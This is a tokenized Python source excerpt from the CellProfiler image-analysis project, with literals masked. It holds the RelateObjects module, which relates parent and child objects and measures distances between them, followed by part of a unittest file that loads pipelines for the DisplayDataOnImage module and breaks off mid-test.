COLTYPE_INTEGER <EOL> except : <EOL> try : <EOL> fv = float ( x ) <EOL> return cpmeas . COLTYPE_FLOAT <EOL> except : <EOL> return cpmeas . COLTYPE_VARCHAR </s>
<s> '''<STR_LIT>''' <EOL> import re <EOL> import sys <EOL> import numpy as np <EOL> import scipy . ndimage as scind <EOL> from centrosome . cpmorphology import centers_of_labels <EOL> from centrosome . cpmorphology import fixup_scipy_ndimage_result as fix <EOL> from centrosome . outline import outline <EOL> import cellprofiler . cpmodule as cpm <EOL> import cellprofiler . measurements as cpmeas <EOL> import cellprofiler . settings as cps <EOL> from cellprofiler . modules . identify import C_PARENT , C_CHILDREN , R_PARENT , R_CHILD <EOL> from cellprofiler . modules . identify import FF_PARENT , FF_CHILDREN_COUNT <EOL> from cellprofiler . modules . identify import M_LOCATION_CENTER_X , M_LOCATION_CENTER_Y , M_NUMBER_OBJECT_NUMBER <EOL> from cellprofiler . settings import YES , NO <EOL> D_NONE = "<STR_LIT:None>" <EOL> D_CENTROID = "<STR_LIT>" <EOL> D_MINIMUM = "<STR_LIT>" <EOL> D_BOTH = "<STR_LIT>" <EOL> D_ALL = [ D_NONE , D_CENTROID , D_MINIMUM , D_BOTH ] <EOL> C_MEAN = "<STR_LIT>" <EOL> FF_MEAN = '<STR_LIT>' % C_MEAN <EOL> '''<STR_LIT>''' <EOL> C_DISTANCE = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> FEAT_CENTROID = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> FEAT_MINIMUM = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> FF_CENTROID = '<STR_LIT>' % ( C_DISTANCE , FEAT_CENTROID ) <EOL> '''<STR_LIT>''' <EOL> FF_MINIMUM = '<STR_LIT>' % ( C_DISTANCE , FEAT_MINIMUM ) <EOL> FIXED_SETTING_COUNT = <NUM_LIT:5> <EOL> VARIABLE_SETTING_COUNT = <NUM_LIT:1> <EOL> class RelateObjects ( cpm . CPModule ) : <EOL> module_name = '<STR_LIT>' <EOL> category = "<STR_LIT>" <EOL> variable_revision_number = <NUM_LIT:2> <EOL> def create_settings ( self ) : <EOL> self . sub_object_name = cps . ObjectNameSubscriber ( <EOL> '<STR_LIT>' , cps . NONE , doc = """<STR_LIT>""" ) <EOL> self . parent_name = cps . ObjectNameSubscriber ( <EOL> '<STR_LIT>' , <EOL> cps . NONE , doc = """<STR_LIT>""" ) <EOL> self . find_parent_child_distances = cps . 
Choice ( <EOL> "<STR_LIT>" , <EOL> D_ALL , doc = """<STR_LIT>""" % globals ( ) ) <EOL> self . wants_step_parent_distances = cps . Binary ( <EOL> "<STR_LIT>" , False , doc = """<STR_LIT>""" % globals ( ) ) <EOL> self . step_parent_names = [ ] <EOL> self . add_step_parent ( can_delete = False ) <EOL> self . add_step_parent_button = cps . DoSomething ( "<STR_LIT>" , "<STR_LIT>" , <EOL> self . add_step_parent ) <EOL> self . wants_per_parent_means = cps . Binary ( <EOL> '<STR_LIT>' , <EOL> False , doc = """<STR_LIT>""" % globals ( ) ) <EOL> def add_step_parent ( self , can_delete = True ) : <EOL> group = cps . SettingsGroup ( ) <EOL> group . append ( "<STR_LIT>" , cps . Choice ( <EOL> "<STR_LIT>" , [ cps . NONE ] , <EOL> choices_fn = self . get_step_parents , doc = """<STR_LIT>""" ) ) <EOL> if can_delete : <EOL> group . append ( "<STR_LIT>" , cps . RemoveSettingButton ( <EOL> "<STR_LIT>" , "<STR_LIT>" , self . step_parent_names , group ) ) <EOL> self . step_parent_names . append ( group ) <EOL> def get_step_parents ( self , pipeline ) : <EOL> '''<STR_LIT>''' <EOL> step_parents = set ( ) <EOL> parent_name = self . parent_name . value <EOL> for module in pipeline . modules ( ) : <EOL> if module . module_num == self . module_num : <EOL> return list ( step_parents ) <EOL> grandparents = module . get_measurements ( pipeline , parent_name , <EOL> C_PARENT ) <EOL> step_parents . update ( grandparents ) <EOL> siblings = module . get_measurements ( pipeline , parent_name , <EOL> C_CHILDREN ) <EOL> for sibling in siblings : <EOL> match = re . match ( "<STR_LIT>" , sibling ) <EOL> if match is not None : <EOL> sibling_name = match . groups ( ) [ <NUM_LIT:0> ] <EOL> if parent_name in module . get_measurements ( pipeline , <EOL> sibling_name , <EOL> C_PARENT ) : <EOL> step_parents . add ( sibling_name ) <EOL> return list ( step_parents ) <EOL> @ property <EOL> def has_step_parents ( self ) : <EOL> '''<STR_LIT>''' <EOL> return ( len ( self . 
step_parent_names ) > <NUM_LIT:0> and <EOL> len ( self . step_parent_names [ <NUM_LIT:0> ] . step_parent_name . choices ) > <NUM_LIT:0> ) <EOL> def settings ( self ) : <EOL> result = [ self . sub_object_name , self . parent_name , <EOL> self . find_parent_child_distances , self . wants_per_parent_means , <EOL> self . wants_step_parent_distances ] <EOL> result += [ group . step_parent_name for group in self . step_parent_names ] <EOL> return result <EOL> def visible_settings ( self ) : <EOL> result = [ self . sub_object_name , self . parent_name , <EOL> self . wants_per_parent_means , <EOL> self . find_parent_child_distances ] <EOL> if ( self . find_parent_child_distances != D_NONE and <EOL> self . has_step_parents ) : <EOL> result += [ self . wants_step_parent_distances ] <EOL> if self . wants_step_parent_distances : <EOL> for group in self . step_parent_names : <EOL> result += group . visible_settings ( ) <EOL> result += [ self . add_step_parent_button ] <EOL> return result <EOL> def run ( self , workspace ) : <EOL> parents = workspace . object_set . get_objects ( self . parent_name . value ) <EOL> children = workspace . object_set . get_objects ( self . sub_object_name . value ) <EOL> child_count , parents_of = parents . relate_children ( children ) <EOL> m = workspace . measurements <EOL> assert isinstance ( m , cpmeas . Measurements ) <EOL> m . add_measurement ( self . sub_object_name . value , <EOL> FF_PARENT % self . parent_name . value , <EOL> parents_of ) <EOL> m . add_measurement ( self . parent_name . value , <EOL> FF_CHILDREN_COUNT % self . sub_object_name . value , <EOL> child_count ) <EOL> good_parents = parents_of [ parents_of != <NUM_LIT:0> ] <EOL> image_numbers = np . ones ( len ( good_parents ) , int ) * m . image_set_number <EOL> good_children = np . argwhere ( parents_of != <NUM_LIT:0> ) . flatten ( ) + <NUM_LIT:1> <EOL> if np . any ( good_parents ) : <EOL> m . add_relate_measurement ( self . module_num , <EOL> R_PARENT , <EOL> self . 
parent_name . value , <EOL> self . sub_object_name . value , <EOL> image_numbers , <EOL> good_parents , <EOL> image_numbers , <EOL> good_children ) <EOL> m . add_relate_measurement ( self . module_num , <EOL> R_CHILD , <EOL> self . sub_object_name . value , <EOL> self . parent_name . value , <EOL> image_numbers , <EOL> good_children , <EOL> image_numbers , <EOL> good_parents ) <EOL> parent_names = self . get_parent_names ( ) <EOL> for parent_name in parent_names : <EOL> if self . find_parent_child_distances in ( D_BOTH , D_CENTROID ) : <EOL> self . calculate_centroid_distances ( workspace , parent_name ) <EOL> if self . find_parent_child_distances in ( D_BOTH , D_MINIMUM ) : <EOL> self . calculate_minimum_distances ( workspace , parent_name ) <EOL> if self . wants_per_parent_means . value : <EOL> parent_indexes = np . arange ( np . max ( parents . segmented ) ) + <NUM_LIT:1> <EOL> for feature_name in m . get_feature_names ( self . sub_object_name . value ) : <EOL> if not self . should_aggregate_feature ( feature_name ) : <EOL> continue <EOL> data = m . get_current_measurement ( self . sub_object_name . value , <EOL> feature_name ) <EOL> if data is not None and len ( data ) > <NUM_LIT:0> : <EOL> if len ( parents_of ) > <NUM_LIT:0> : <EOL> means = fix ( scind . mean ( data . astype ( float ) , <EOL> parents_of , parent_indexes ) ) <EOL> else : <EOL> means = np . zeros ( ( <NUM_LIT:0> , ) ) <EOL> else : <EOL> means = np . ones ( len ( parents_of ) ) * np . nan <EOL> mean_feature_name = FF_MEAN % ( self . sub_object_name . value , <EOL> feature_name ) <EOL> m . add_measurement ( self . parent_name . value , mean_feature_name , <EOL> means ) <EOL> if self . show_window : <EOL> workspace . display_data . parent_labels = parents . segmented <EOL> workspace . display_data . parent_count = parents . count <EOL> workspace . display_data . child_labels = children . segmented <EOL> workspace . display_data . 
parents_of = parents_of <EOL> def display ( self , workspace , figure ) : <EOL> if not self . show_window : <EOL> return <EOL> from cellprofiler . gui . cpfigure_tools import renumber_labels_for_display <EOL> figure . set_subplots ( ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> renumbered_parent_labels = renumber_labels_for_display ( <EOL> workspace . display_data . parent_labels ) <EOL> child_labels = workspace . display_data . child_labels <EOL> parents_of = workspace . display_data . parents_of <EOL> mapping = np . arange ( workspace . display_data . parent_count + <NUM_LIT:1> ) <EOL> mapping [ workspace . display_data . parent_labels . flatten ( ) ] = renumbered_parent_labels . flatten ( ) <EOL> parent_labeled_children = np . zeros ( child_labels . shape , int ) <EOL> mask = child_labels > <NUM_LIT:0> <EOL> parent_labeled_children [ mask ] = mapping [ parents_of [ child_labels [ mask ] - <NUM_LIT:1> ] ] <EOL> figure . subplot_imshow_labels ( <EOL> <NUM_LIT:0> , <NUM_LIT:0> , renumbered_parent_labels , <EOL> title = self . parent_name . value , <EOL> renumber = False ) <EOL> figure . subplot_imshow_labels ( <EOL> <NUM_LIT:1> , <NUM_LIT:0> , child_labels , <EOL> title = self . sub_object_name . value , <EOL> sharex = figure . subplot ( <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> sharey = figure . subplot ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> figure . subplot_imshow_labels ( <EOL> <NUM_LIT:0> , <NUM_LIT:1> , parent_labeled_children , <EOL> "<STR_LIT>" % <EOL> ( self . sub_object_name . value , <EOL> self . parent_name . value ) , <EOL> renumber = False , <EOL> sharex = figure . subplot ( <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> sharey = figure . subplot ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> def get_parent_names ( self ) : <EOL> '''<STR_LIT>''' <EOL> parent_names = [ self . parent_name . value ] <EOL> if self . wants_step_parent_distances . value : <EOL> parent_names += [ group . step_parent_name . value <EOL> for group in self . 
step_parent_names ] <EOL> return parent_names <EOL> def calculate_centroid_distances ( self , workspace , parent_name ) : <EOL> '''<STR_LIT>''' <EOL> meas = workspace . measurements <EOL> assert isinstance ( meas , cpmeas . Measurements ) <EOL> sub_object_name = self . sub_object_name . value <EOL> parents = workspace . object_set . get_objects ( parent_name ) <EOL> children = workspace . object_set . get_objects ( sub_object_name ) <EOL> parents_of = self . get_parents_of ( workspace , parent_name ) <EOL> pcenters = centers_of_labels ( parents . segmented ) . transpose ( ) <EOL> ccenters = centers_of_labels ( children . segmented ) . transpose ( ) <EOL> if pcenters . shape [ <NUM_LIT:0> ] == <NUM_LIT:0> or ccenters . shape [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> dist = np . array ( [ np . NaN ] * len ( parents_of ) ) <EOL> else : <EOL> parents_of = parents_of - <NUM_LIT:1> <EOL> mask = ( parents_of != - <NUM_LIT:1> ) | ( parents_of > pcenters . shape [ <NUM_LIT:0> ] ) <EOL> dist = np . array ( [ np . NaN ] * ccenters . shape [ <NUM_LIT:0> ] ) <EOL> dist [ mask ] = np . sqrt ( np . sum ( ( ccenters [ mask , : ] - <EOL> pcenters [ parents_of [ mask ] , : ] ) ** <NUM_LIT:2> , <NUM_LIT:1> ) ) <EOL> meas . add_measurement ( sub_object_name , FF_CENTROID % parent_name , dist ) <EOL> def calculate_minimum_distances ( self , workspace , parent_name ) : <EOL> '''<STR_LIT>''' <EOL> meas = workspace . measurements <EOL> assert isinstance ( meas , cpmeas . Measurements ) <EOL> sub_object_name = self . sub_object_name . value <EOL> parents = workspace . object_set . get_objects ( parent_name ) <EOL> children = workspace . object_set . get_objects ( sub_object_name ) <EOL> parents_of = self . get_parents_of ( workspace , parent_name ) <EOL> if len ( parents_of ) == <NUM_LIT:0> : <EOL> dist = np . zeros ( ( <NUM_LIT:0> , ) ) <EOL> elif np . all ( parents_of == <NUM_LIT:0> ) : <EOL> dist = np . array ( [ np . 
NaN ] * len ( parents_of ) ) <EOL> else : <EOL> mask = parents_of > <NUM_LIT:0> <EOL> ccenters = centers_of_labels ( children . segmented ) . transpose ( ) <EOL> ccenters = ccenters [ mask , : ] <EOL> parents_of_masked = parents_of [ mask ] - <NUM_LIT:1> <EOL> pperim = outline ( parents . segmented ) <EOL> perim_loc = np . argwhere ( pperim != <NUM_LIT:0> ) <EOL> perim_idx = pperim [ perim_loc [ : , <NUM_LIT:0> ] , perim_loc [ : , <NUM_LIT:1> ] ] <EOL> idx = np . lexsort ( ( perim_loc [ : , <NUM_LIT:1> ] , perim_loc [ : , <NUM_LIT:0> ] , perim_idx ) ) <EOL> perim_loc = perim_loc [ idx , : ] <EOL> perim_idx = perim_idx [ idx ] <EOL> counts = fix ( scind . sum ( np . ones ( len ( perim_idx ) ) , perim_idx , <EOL> np . arange ( <NUM_LIT:1> , perim_idx [ - <NUM_LIT:1> ] + <NUM_LIT:1> ) ) ) . astype ( np . int32 ) <EOL> indexes = np . cumsum ( counts ) - counts <EOL> ccounts = counts [ parents_of_masked ] <EOL> cindexes = indexes [ parents_of_masked ] <EOL> clabel = np . zeros ( np . sum ( ccounts ) , int ) <EOL> cfirst = np . cumsum ( ccounts ) - ccounts <EOL> clabel [ cfirst [ <NUM_LIT:1> : ] ] += <NUM_LIT:1> <EOL> clabel = np . cumsum ( clabel ) <EOL> cp_index = np . arange ( len ( clabel ) ) - cfirst [ clabel ] <EOL> cp_index += cindexes [ clabel ] <EOL> dist = np . sqrt ( np . sum ( ( perim_loc [ cp_index , : ] - <EOL> ccenters [ clabel , : ] ) ** <NUM_LIT:2> , <NUM_LIT:1> ) ) <EOL> min_dist = fix ( scind . minimum ( dist , clabel , np . arange ( len ( ccounts ) ) ) ) <EOL> dist = np . array ( [ np . NaN ] * len ( mask ) ) <EOL> dist [ mask ] = min_dist <EOL> meas . add_measurement ( sub_object_name , FF_MINIMUM % parent_name , dist ) <EOL> def get_parents_of ( self , workspace , parent_name ) : <EOL> '''<STR_LIT>''' <EOL> meas = workspace . measurements <EOL> assert isinstance ( meas , cpmeas . Measurements ) <EOL> parent_feature = FF_PARENT % parent_name <EOL> primary_parent = self . parent_name . value <EOL> sub_object_name = self . sub_object_name . 
value <EOL> primary_parent_feature = FF_PARENT % primary_parent <EOL> if parent_feature in meas . get_feature_names ( sub_object_name ) : <EOL> parents_of = meas . get_current_measurement ( sub_object_name , <EOL> parent_feature ) <EOL> elif parent_feature in meas . get_feature_names ( primary_parent ) : <EOL> primary_parents_of = meas . get_current_measurement ( <EOL> sub_object_name , primary_parent_feature ) <EOL> grandparents_of = meas . get_current_measurement ( primary_parent , <EOL> parent_feature ) <EOL> mask = primary_parents_of != <NUM_LIT:0> <EOL> parents_of = np . zeros ( primary_parents_of . shape [ <NUM_LIT:0> ] , <EOL> grandparents_of . dtype ) <EOL> if primary_parents_of . shape [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL> parents_of [ mask ] = grandparents_of [ primary_parents_of [ mask ] - <NUM_LIT:1> ] <EOL> elif primary_parent_feature in meas . get_feature_names ( parent_name ) : <EOL> primary_parents_of = meas . get_current_measurement ( <EOL> sub_object_name , primary_parent_feature ) <EOL> primary_parents_of_parent = meas . get_current_measurement ( <EOL> parent_name , primary_parent_feature ) <EOL> reverse_lookup_len = max ( np . max ( primary_parents_of ) + <NUM_LIT:1> , <EOL> len ( primary_parents_of_parent ) ) <EOL> reverse_lookup = np . zeros ( reverse_lookup_len , int ) <EOL> if primary_parents_of_parent . shape [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL> reverse_lookup [ primary_parents_of_parent ] = np . arange ( <NUM_LIT:1> , len ( primary_parents_of_parent ) + <NUM_LIT:1> ) <EOL> if primary_parents_of . shape [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL> parents_of = reverse_lookup [ primary_parents_of ] <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ( primary_parent , parent_name ) ) <EOL> return parents_of <EOL> ignore_features = set ( M_NUMBER_OBJECT_NUMBER ) <EOL> def should_aggregate_feature ( self , feature_name ) : <EOL> '''<STR_LIT>''' <EOL> if feature_name . startswith ( C_MEAN ) : <EOL> return False <EOL> if feature_name . 
startswith ( C_PARENT ) : <EOL> return False <EOL> if feature_name in self . ignore_features : <EOL> return False <EOL> return True <EOL> def validate_module ( self , pipeline ) : <EOL> '''<STR_LIT>''' <EOL> for module in pipeline . modules ( ) : <EOL> if module == self : <EOL> break <EOL> parent_features = module . get_measurements ( <EOL> pipeline , self . sub_object_name . value , "<STR_LIT>" ) <EOL> if self . parent_name . value in parent_features : <EOL> raise cps . ValidationError ( <EOL> "<STR_LIT>" % <EOL> ( self . sub_object_name . value , self . parent_name . value , <EOL> module . module_name ) , self . parent_name ) <EOL> if self . has_step_parents and self . wants_step_parent_distances : <EOL> step_parents = set ( ) <EOL> for group in self . step_parent_names : <EOL> if group . step_parent_name . value in step_parents : <EOL> raise cps . ValidationError ( <EOL> "<STR_LIT>" % <EOL> group . step_parent_name . value , <EOL> group . step_parent_name ) <EOL> step_parents . add ( group . step_parent_name . value ) <EOL> def get_child_columns ( self , pipeline ) : <EOL> child_columns = pipeline . get_measurement_columns ( self ) <EOL> child_columns = [ column <EOL> for column in child_columns <EOL> if column [ <NUM_LIT:0> ] == self . sub_object_name . value and <EOL> self . should_aggregate_feature ( column [ <NUM_LIT:1> ] ) ] + self . get_child_measurement_columns ( pipeline ) <EOL> return child_columns <EOL> def get_child_measurement_columns ( self , pipeline ) : <EOL> columns = [ ] <EOL> if self . find_parent_child_distances in ( D_BOTH , D_CENTROID ) : <EOL> for parent_name in self . get_parent_names ( ) : <EOL> columns += [ ( self . sub_object_name . value , <EOL> FF_CENTROID % parent_name , <EOL> cpmeas . COLTYPE_INTEGER ) ] <EOL> if self . find_parent_child_distances in ( D_BOTH , D_MINIMUM ) : <EOL> for parent_name in self . get_parent_names ( ) : <EOL> columns += [ ( self . sub_object_name . value , <EOL> FF_MINIMUM % parent_name , <EOL> cpmeas . 
COLTYPE_INTEGER ) ] <EOL> return columns <EOL> def get_measurement_columns ( self , pipeline ) : <EOL> '''<STR_LIT>''' <EOL> columns = [ ( self . sub_object_name . value , <EOL> FF_PARENT % self . parent_name . value , <EOL> cpmeas . COLTYPE_INTEGER ) , <EOL> ( self . parent_name . value , <EOL> FF_CHILDREN_COUNT % self . sub_object_name . value , <EOL> cpmeas . COLTYPE_INTEGER ) ] <EOL> if self . wants_per_parent_means . value : <EOL> child_columns = self . get_child_columns ( pipeline ) <EOL> columns += [ ( self . parent_name . value , <EOL> FF_MEAN % ( self . sub_object_name . value , column [ <NUM_LIT:1> ] ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for column in child_columns ] <EOL> columns += self . get_child_measurement_columns ( pipeline ) <EOL> return columns <EOL> def get_object_relationships ( self , pipeline ) : <EOL> '''<STR_LIT>''' <EOL> parent_name = self . parent_name . value <EOL> sub_object_name = self . sub_object_name . value <EOL> return [ ( R_PARENT , parent_name , sub_object_name , <EOL> cpmeas . MCA_AVAILABLE_EACH_CYCLE ) , <EOL> ( R_CHILD , sub_object_name , parent_name , <EOL> cpmeas . MCA_AVAILABLE_EACH_CYCLE ) ] <EOL> def get_categories ( self , pipeline , object_name ) : <EOL> if object_name == self . parent_name . value : <EOL> if self . wants_per_parent_means : <EOL> return [ "<STR_LIT>" % self . sub_object_name , "<STR_LIT>" ] <EOL> else : <EOL> return [ "<STR_LIT>" ] <EOL> elif object_name == self . sub_object_name . value : <EOL> result = [ "<STR_LIT>" ] <EOL> if self . find_parent_child_distances != D_NONE : <EOL> result += [ C_DISTANCE ] <EOL> return result <EOL> return [ ] <EOL> def get_measurements ( self , pipeline , object_name , category ) : <EOL> if object_name == self . parent_name . value : <EOL> if category == "<STR_LIT>" % self . sub_object_name . value : <EOL> measurements = [ ] <EOL> child_columns = self . 
get_child_columns ( pipeline ) <EOL> measurements += [ column [ <NUM_LIT:1> ] for column in child_columns ] <EOL> return measurements <EOL> elif category == "<STR_LIT>" : <EOL> return [ "<STR_LIT>" % self . sub_object_name . value ] <EOL> elif object_name == self . sub_object_name . value and category == "<STR_LIT>" : <EOL> return [ self . parent_name . value ] <EOL> elif ( object_name == self . sub_object_name . value and <EOL> category == C_DISTANCE ) : <EOL> result = [ ] <EOL> if self . find_parent_child_distances in ( D_BOTH , D_CENTROID ) : <EOL> result += [ '<STR_LIT>' % ( FEAT_CENTROID , parent_name ) <EOL> for parent_name in self . get_parent_names ( ) ] <EOL> if self . find_parent_child_distances in ( D_BOTH , D_MINIMUM ) : <EOL> result += [ '<STR_LIT>' % ( FEAT_MINIMUM , parent_name ) <EOL> for parent_name in self . get_parent_names ( ) ] <EOL> return result <EOL> return [ ] <EOL> def prepare_settings ( self , setting_values ) : <EOL> """<STR_LIT>""" <EOL> setting_count = len ( setting_values ) <EOL> step_parent_count = ( ( setting_count - FIXED_SETTING_COUNT ) / <EOL> VARIABLE_SETTING_COUNT ) <EOL> assert len ( self . step_parent_names ) > <NUM_LIT:0> <EOL> self . step_parent_names = self . step_parent_names [ : <NUM_LIT:1> ] <EOL> for i in range ( <NUM_LIT:1> , step_parent_count ) : <EOL> self . add_step_parent ( ) <EOL> def upgrade_settings ( self , setting_values , variable_revision_number , module_name , from_matlab ) : <EOL> if from_matlab and variable_revision_number == <NUM_LIT:2> : <EOL> setting_values = [ setting_values [ <NUM_LIT:0> ] , <EOL> setting_values [ <NUM_LIT:1> ] , <EOL> setting_values [ <NUM_LIT:2> ] , <EOL> cps . DO_NOT_USE , <EOL> cps . YES ] <EOL> variable_revision_number = <NUM_LIT:3> <EOL> if from_matlab and variable_revision_number == <NUM_LIT:3> : <EOL> setting_values = list ( setting_values ) <EOL> setting_values [ <NUM_LIT:2> ] = ( D_MINIMUM if setting_values [ <NUM_LIT:2> ] == cps . 
YES <EOL> else D_NONE ) <EOL> variable_revision_number = <NUM_LIT:4> <EOL> if from_matlab and variable_revision_number == <NUM_LIT:4> : <EOL> if setting_values [ <NUM_LIT:2> ] == cps . DO_NOT_USE : <EOL> setting_values = ( setting_values [ : <NUM_LIT:2> ] + [ D_NONE ] + <EOL> setting_values [ <NUM_LIT:3> : ] ) <EOL> from_matlab = False <EOL> variable_revision_number = <NUM_LIT:1> <EOL> if ( not from_matlab ) and variable_revision_number == <NUM_LIT:1> : <EOL> if setting_values [ <NUM_LIT:2> ] == cps . DO_NOT_USE : <EOL> find_parent_distances = D_NONE <EOL> else : <EOL> find_parent_distances = setting_values [ <NUM_LIT:2> ] <EOL> wants_step_parent_distances = ( <EOL> cps . NO if setting_values [ <NUM_LIT:3> ] . upper ( ) == cps . DO_NOT_USE . upper ( ) <EOL> else cps . YES ) <EOL> setting_values = ( setting_values [ : <NUM_LIT:2> ] + <EOL> [ find_parent_distances , <EOL> setting_values [ <NUM_LIT:4> ] , <EOL> wants_step_parent_distances , <EOL> setting_values [ <NUM_LIT:3> ] ] ) <EOL> variable_revision_number = <NUM_LIT:2> <EOL> return setting_values , variable_revision_number , from_matlab <EOL> Relate = RelateObjects </s>
'''<STR_LIT>'''

import base64
import unittest
import zlib
from StringIO import StringIO  # Python 2: this test file targets py2

import numpy as np

from cellprofiler.preferences import set_headless

# Must run before any GUI-dependent CellProfiler import.
set_headless()

import cellprofiler.workspace as cpw
import cellprofiler.cpgridinfo as cpg
import cellprofiler.cpimage as cpi
import cellprofiler.cpmodule as cpm
import cellprofiler.objects as cpo
import cellprofiler.measurements as cpmeas
import cellprofiler.pipeline as cpp
import cellprofiler.modules.displaydataonimage as D
from centrosome.cpmorphology import centers_of_labels

# Fixture names shared by all tests below.
INPUT_IMAGE_NAME = '<STR_LIT>'
OUTPUT_IMAGE_NAME = '<STR_LIT>'
OBJECTS_NAME = '<STR_LIT>'
MEASUREMENT_NAME = '<STR_LIT>'


class TestDisplayDataOnImage(unittest.TestCase):
    """Tests for the DisplayDataOnImage module.

    The test_01_xx tests check loading of pipelines saved by older
    versions; the test_02_xx tests run the module on synthetic data.
    """

    def test_01_00_load_matlab(self):
        """Load a Matlab-era pipeline (base64 + zlib encoded)."""
        data = ('<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>')
        pipeline = cpp.Pipeline()

        def callback(caller, event):
            # Any load error fails the test.
            self.assertFalse(isinstance(event, cpp.LoadExceptionEvent))
        pipeline.add_listener(callback)
        pipeline.load(StringIO(zlib.decompress(base64.b64decode(data))))
        self.assertEqual(len(pipeline.modules()), <NUM_LIT:3>)
        module = pipeline.modules()[-<NUM_LIT:1>]
        self.assertTrue(isinstance(module, D.DisplayDataOnImage))
        self.assertEqual(module.image_name, "<STR_LIT>")
        self.assertEqual(module.text_color, "<STR_LIT>")
        self.assertEqual(module.objects_or_image, D.OI_IMAGE)
        self.assertEqual(module.display_image, "<STR_LIT>")
        self.assertEqual(module.saved_image_contents, "<STR_LIT>")

    def test_01_01_load_v1(self):
        """Load a revision-1 pipeline (base64 + zlib encoded)."""
        data = ('<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>')
        pipeline = cpp.Pipeline()

        def callback(caller, event):
            self.assertFalse(isinstance(event, cpp.LoadExceptionEvent))
        pipeline.add_listener(callback)
        pipeline.load(StringIO(zlib.decompress(base64.b64decode(data))))
        self.assertEqual(len(pipeline.modules()), <NUM_LIT:3>)
        module = pipeline.modules()[-<NUM_LIT:1>]
        self.assertTrue(isinstance(module, D.DisplayDataOnImage))
        self.assertEqual(module.objects_or_image, D.OI_OBJECTS)
        self.assertEqual(module.objects_name, "<STR_LIT>")
        self.assertEqual(module.measurement, "<STR_LIT>")
        self.assertEqual(module.image_name, "<STR_LIT>")
        self.assertEqual(module.text_color, "<STR_LIT>")
        self.assertEqual(module.display_image, "<STR_LIT>")
        self.assertEqual(module.saved_image_contents, "<STR_LIT>")

    def test_01_04_load_v4(self):
        """Load a revision-4 pipeline (plain pipeline text)."""
        data = r"""<STR_LIT>"""
        pipeline = cpp.Pipeline()

        def callback(caller, event):
            self.assertFalse(isinstance(event, cpp.LoadExceptionEvent))
        pipeline.add_listener(callback)
        pipeline.load(StringIO(data))
        self.assertEqual(len(pipeline.modules()), <NUM_LIT:1>)
        module = pipeline.modules()[<NUM_LIT:0>]
        self.assertTrue(isinstance(module, D.DisplayDataOnImage))
        self.assertEqual(module.objects_or_image, D.OI_OBJECTS)
        self.assertEqual(module.measurement, "<STR_LIT>")
        self.assertEqual(module.image_name, "<STR_LIT>")
        self.assertEqual(module.text_color, "<STR_LIT>")
        self.assertEqual(module.objects_name, "<STR_LIT>")
        self.assertEqual(module.display_image, "<STR_LIT>")
        self.assertEqual(module.font_size, <NUM_LIT:10>)
        self.assertEqual(module.decimals, <NUM_LIT:2>)
        self.assertEqual(module.saved_image_contents, D.E_AXES)
        self.assertEqual(module.offset, <NUM_LIT:5>)
        self.assertEqual(module.color_or_text, D.CT_COLOR)
        self.assertEqual(module.colormap, "<STR_LIT>")
        self.assertTrue(module.wants_image)

    # NOTE(review): the "_01_04_" numeric prefix is duplicated from the v4
    # test above (the "_v5" suffix keeps the names distinct, so both still
    # run); presumably this was meant to be test_01_05.
    def test_01_04_load_v5(self):
        """Load a revision-5 pipeline (plain pipeline text)."""
        data = r"""<STR_LIT>"""
        pipeline = cpp.Pipeline()

        def callback(caller, event):
            self.assertFalse(isinstance(event, cpp.LoadExceptionEvent))
        pipeline.add_listener(callback)
        pipeline.load(StringIO(data))
        self.assertEqual(len(pipeline.modules()), <NUM_LIT:1>)
        module = pipeline.modules()[<NUM_LIT:0>]
        self.assertTrue(isinstance(module, D.DisplayDataOnImage))
        self.assertEqual(module.objects_or_image, D.OI_OBJECTS)
        self.assertEqual(module.measurement, "<STR_LIT>")
        self.assertEqual(module.image_name, "<STR_LIT>")
        self.assertEqual(module.text_color, "<STR_LIT>")
        self.assertEqual(module.objects_name, "<STR_LIT>")
        self.assertEqual(module.display_image, "<STR_LIT>")
        self.assertEqual(module.font_size, <NUM_LIT:10>)
        self.assertEqual(module.decimals, <NUM_LIT:2>)
        self.assertEqual(module.saved_image_contents, D.E_AXES)
        self.assertEqual(module.offset, <NUM_LIT:5>)
        self.assertEqual(module.color_or_text, D.CT_COLOR)
        self.assertEqual(module.colormap, "<STR_LIT>")
        self.assertFalse(module.wants_image)
        self.assertEqual(module.color_map_scale_choice,
                         D.CMS_USE_MEASUREMENT_RANGE)
        self.assertEqual(module.color_map_scale.min, <NUM_LIT:0>)
        self.assertEqual(module.color_map_scale.max, <NUM_LIT:1>)

    def test_01_06_load_v6(self):
        """Load a revision-6 pipeline with two module instances."""
        data = r"""<STR_LIT>"""
        pipeline = cpp.Pipeline()

        def callback(caller, event):
            self.assertFalse(isinstance(event, cpp.LoadExceptionEvent))
        pipeline.add_listener(callback)
        pipeline.load(StringIO(data))
        self.assertEqual(len(pipeline.modules()), <NUM_LIT:2>)
        module = pipeline.modules()[<NUM_LIT:0>]
